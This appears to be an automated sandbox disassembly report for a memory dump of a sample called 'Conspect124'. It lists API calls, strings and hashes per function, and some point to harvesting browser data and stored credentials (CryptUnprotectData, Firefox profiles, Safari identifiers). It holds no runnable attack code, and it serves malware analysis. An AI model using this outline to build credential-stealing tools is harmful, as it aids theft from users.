                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                      • API String ID: 2929817778-1134094380
                                      • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                      • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                      Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                      • String ID: :stringdata$ftp://$http://$https://
                                      • API String ID: 2787044678-1921111777
                                      • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                      • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                      Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                      • GetDC.USER32 ref: 004140E3
                                      • wcslen.MSVCRT ref: 00414123
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                      • _snwprintf.MSVCRT ref: 00414244
                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                      • String ID: %s:$EDIT$STATIC
                                      • API String ID: 2080319088-3046471546
                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                      Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EndDialog.USER32(?,?), ref: 00413221
                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                      • memset.MSVCRT ref: 00413292
                                      • memset.MSVCRT ref: 004132B4
                                      • memset.MSVCRT ref: 004132CD
                                      • memset.MSVCRT ref: 004132E1
                                      • memset.MSVCRT ref: 004132FB
                                      • memset.MSVCRT ref: 00413310
                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                      • memset.MSVCRT ref: 004133C0
                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                      • wcscpy.MSVCRT ref: 0041341F
                                      • _snwprintf.MSVCRT ref: 0041348E
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                      • SetFocus.USER32(00000000), ref: 004134B7
                                      Strings
                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                      • {Unknown}, xrefs: 004132A6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                      • API String ID: 4111938811-1819279800
                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                      Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                      • EndDialog.USER32(?,?), ref: 0040135E
                                      • DeleteObject.GDI32(?), ref: 0040136A
                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                      • ShowWindow.USER32(00000000), ref: 00401398
                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                      • String ID:
                                      • API String ID: 829165378-0
                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                      Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00404172
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 004041D6
                                      • wcscpy.MSVCRT ref: 004041E7
                                      • memset.MSVCRT ref: 00404200
                                      • memset.MSVCRT ref: 00404215
                                      • _snwprintf.MSVCRT ref: 0040422F
                                      • wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 0040426E
                                      • memset.MSVCRT ref: 004042CD
                                      • memset.MSVCRT ref: 004042E2
                                      • _snwprintf.MSVCRT ref: 004042FE
                                      • wcscpy.MSVCRT ref: 00404311
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                      • API String ID: 2454223109-1580313836
                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                      Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                      • API String ID: 4054529287-3175352466
                                      • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                      • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                      Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                      • API String ID: 667068680-2887671607
                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                      Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                      • API String ID: 1607361635-601624466
                                      • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                      • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                      Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintf$memset$wcscpy
                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                      • API String ID: 2000436516-3842416460
                                      • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                      • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                      Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1043902810-0
                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                      Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • free.MSVCRT ref: 0040E49A
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                      • memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                      • wcschr.MSVCRT ref: 0040E3B8
                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                      • API String ID: 3849927982-2252543386
                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                      Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                      • _snwprintf.MSVCRT ref: 0044488A
                                      • wcscpy.MSVCRT ref: 004448B4
                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
